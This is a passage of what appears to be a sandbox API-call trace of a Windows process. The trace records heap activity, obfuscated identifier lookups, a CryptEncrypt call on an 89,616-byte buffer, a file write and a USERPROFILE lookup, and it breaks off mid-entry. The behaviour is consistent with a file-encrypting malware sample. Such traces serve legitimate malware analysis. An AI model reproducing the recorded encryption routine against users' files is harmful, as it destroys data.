[0210.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0210.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a741a8 | out: hHeap=0x2af0000) returned 1 [0210.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0210.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0210.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0210.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0210.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0210.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c08 [0210.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0210.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0210.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0210.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0210.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0210.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0210.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0210.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0210.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0210.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0210.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0210.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0210.300] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0210.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0210.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0210.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf78 [0210.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a746b8 [0210.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0210.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0210.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0210.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0210.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0210.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0210.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0210.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0210.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0210.300] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0210.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0210.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0210.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0210.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0210.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0210.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0210.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0210.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0210.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0210.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0210.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0210.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0210.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0210.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0210.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0210.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0210.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0210.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0210.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0210.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c08 [0210.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0210.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0210.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0210.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0210.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0210.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0210.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0210.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0210.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0210.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a746b8 | out: hHeap=0x2af0000) returned 1 [0210.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0210.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0210.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0210.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0210.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0210.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0210.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0210.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0210.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0210.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0210.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0210.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0210.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0210.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0210.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0210.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0210.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0210.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0210.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0210.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ce8 [0210.302] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0210.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0210.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaee8 [0210.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0210.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0210.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0210.303] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0210.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0210.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0210.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0210.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0210.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0210.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0210.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0210.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0210.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0210.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0210.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0210.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0210.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0210.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0210.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0210.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0210.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0210.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0210.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0210.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0210.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0210.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0210.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0210.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0210.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0210.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0210.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0210.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0210.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0210.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0210.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0210.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0210.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0210.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0210.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0210.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0210.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0210.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0210.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0210.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0210.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0210.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0210.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0210.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0210.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37d5e60 | out: hHeap=0x2af0000) returned 1 [0210.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0210.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0210.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0210.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0210.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0210.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0210.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0210.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0210.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0210.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0210.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0210.306] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0210.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0210.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0210.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0210.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0210.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0210.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0210.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0210.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0210.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0210.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0210.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0210.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0210.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0210.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0210.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab2c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0210.316] CryptEncrypt (in: hKey=0x9e1c38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x15e09, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x15e10) returned 1 [0210.316] CharLowerBuffW (in: lpsz="byte[89616]", cchLength=0xb | out: lpsz="byte[89616]") returned 0xb [0210.319] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.319] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.321] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0210.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab338, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0210.321] CryptEncrypt (in: hKey=0x9e1c38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37d5e60*, pdwDataLen=0x8cef60*=0x15e09, dwBufLen=0x15e10 | out: pbData=0x37d5e60*, pdwDataLen=0x8cef60*=0x15e10) returned 1 [0210.325] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0210.325] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0210.325] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0210.326] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0210.326] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.326] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.338] WriteFile (in: hFile=0x520, lpBuffer=0x2ac4690*, nNumberOfBytesToWrite=0x15e10, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2ac4690*, lpNumberOfBytesWritten=0x8cf5e4*=0x15e10, lpOverlapped=0x0) returned 1 [0210.342] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0210.342] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0210.342] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.342] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.342] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0210.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaae70, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0210.342] CryptDestroyKey (hKey=0x9e1c38) returned 1 [0210.342] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0210.342] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0210.342] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0210.342] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0210.343] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.343] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.343] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0210.343] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0210.343] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0210.343] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0210.343] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.343] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.343] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.343] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.343] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0210.343] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0210.343] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0210.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f70a0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0210.343] CryptReleaseContext (hProv=0xa7c440, dwFlags=0x0) returned 1 [0210.343] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.343] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.343] FreeLibrary (hLibModule=0x76390000) returned 1 [0210.343] CloseHandle (hObject=0x4dc) returned 1 [0210.344] CloseHandle (hObject=0x520) returned 1 [0210.348] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0210.348] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0210.348] GetFullPathNameW (in: 